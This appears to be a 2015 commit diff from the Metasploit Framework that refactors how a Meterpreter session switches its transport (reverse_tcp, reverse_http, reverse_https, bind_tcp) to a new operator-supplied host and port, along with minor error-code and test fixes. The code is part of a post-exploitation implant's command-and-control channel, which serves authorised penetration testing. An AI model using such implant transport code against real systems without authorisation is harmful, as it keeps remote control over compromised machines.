Code fixes as per suggestions, fix build

* Use of `ERROR_FAILURE_WINDOWS` in python meterpreter. * Moving of constants/logic to client_core instead of command_dispatcher. * Fix spec include.
2015-04-02 09:05:38 +10:00 · 2015-04-02 09:05:38 +10:00 · 47fa97816d
parent 01bdf54487
commit 47fa97816d
4 changed files with 42 additions and 26 deletions
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@ -578,7 +578,7 @@ class PythonMeterpreter(object):
 			k32 = ctypes.windll.kernel32
 			sys_dir = ctypes.create_unicode_buffer(260)
 			if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
-				return ERROR_FAILURE
+				return ERROR_FAILURE_WINDOWS

 			vol_buf = ctypes.create_unicode_buffer(260)
 			fs_buf = ctypes.create_unicode_buffer(260)
@ -587,7 +587,7 @@ class PythonMeterpreter(object):
 			if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
 					vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
 					None, fs_buf, ctypes.sizeof(fs_buf)):
-				return ERROR_FAILURE
+				return ERROR_FAILURE_WINDOWS
 			serial_num = serial_num.value
 			serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
 		else:
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@ -34,6 +34,18 @@ class ClientCore < Extension
  UNIX_PATH_MAX = 108
  DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"

+  METERPRETER_TRANSPORT_SSL   = 0
+  METERPRETER_TRANSPORT_HTTP  = 1
+  METERPRETER_TRANSPORT_HTTPS = 2
+
+  VALID_TRANSPORTS = {
+    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
+    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
+    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
+    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
+  }
+
+
  include Rex::Payloads::Meterpreter::UriChecksum

  #
@ -241,20 +253,28 @@ class ClientCore < Extension
  end

  def change_transport(opts={})
+    transport = opts[:type].downcase
+
+    unless valid_transport?(transport)
+      raise ArgumentError, "#{transport} is not a valid transport"
+    end
+
    request = Packet.create_request('core_change_transport')

-    url = "#{opts[:scheme]}://#{opts[:lhost]}:#{opts[:lport]}"
+    scheme = transport.split('_')[1]
+    url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"

-    if opts[:adduri]
+    unless transport.ends_with?('tcp')
      checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
      rand = Rex::Text.rand_text_alphanumeric(16)
      url <<  "/#{checksum}_#{rand}/"
    end

-    request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, opts[:type])
+    request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, VALID_TRANSPORTS[transport])
    request.add_tlv(TLV_TYPE_TRANSPORT_URL, url)

-    response = client.send_request(request)
+    client.send_request(request)
+    return true
  end

  #
@ -439,6 +459,13 @@ class ClientCore < Extension
    true
  end

+  #
+  # Indicates if the given transport is a valid transport option.
+  #
+  def valid_transport?(transport)
+    VALID_TRANSPORTS.has_key?(transport.downcase)
+  end
+
  private

  def generate_payload_stub(process)
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@ -18,18 +18,6 @@ class Console::CommandDispatcher::Core

  include Console::CommandDispatcher

-  METERPRETER_TRANSPORT_SSL   = 0
-  METERPRETER_TRANSPORT_HTTP  = 1
-  METERPRETER_TRANSPORT_HTTPS = 2
-
-  VALID_TRANSPORTS = {
-    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
-    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
-    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
-    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
-  }
-
-
  #
  # Initializes an instance of the core command set using the supplied shell
  # for interactivity.
@ -341,17 +329,19 @@ class Console::CommandDispatcher::Core
  def cmd_transport(*args)
    if ( args.length == 0 or args.include?("-h") )
      #cmd_transport_help
-      return true
+      return
    end

    transport = args.shift.downcase
-    unless VALID_TRANSPORTS.has_key?(transport)
+    unless client.core.valid_transport?(transport)
      #cmd_transport_help
+      return
    end

    if transport == 'bind_tcp'
      unless args.length == 1
        #cmd_transport_help
+        return
      end

      lhost = ""
@ -359,19 +349,18 @@ class Console::CommandDispatcher::Core
    else
      unless args.length == 2
        #cmd_transport_help
+        return
      end

      lhost = args.shift
      lport = args.shift.to_i
    end

-    print_status("Swapping transport ...")
+    print_status("Swapping transport to #{transport} at #{lhost}:#{lport} ...")
    client.core.change_transport({
-      :type   => VALID_TRANSPORTS[transport],
-      :scheme => transport.split('_')[1],
+      :type   => transport,
      :lhost  => lhost,
-      :lport  => lport,
-      :adduri => !transport.ends_with?('tcp')
+      :lport  => lport
    })
    client.shutdown_passive_dispatcher
    shell.stop
--- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
+++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
@ -1,5 +1,5 @@
 require 'spec_helper'
-require 'msf/core/handler/reverse_http/uri_checksum'
+require 'rex/payloads/meterpreter/uri_checksum'

 describe Msf::Handler::ReverseHttp::UriChecksum do
   class DummyClass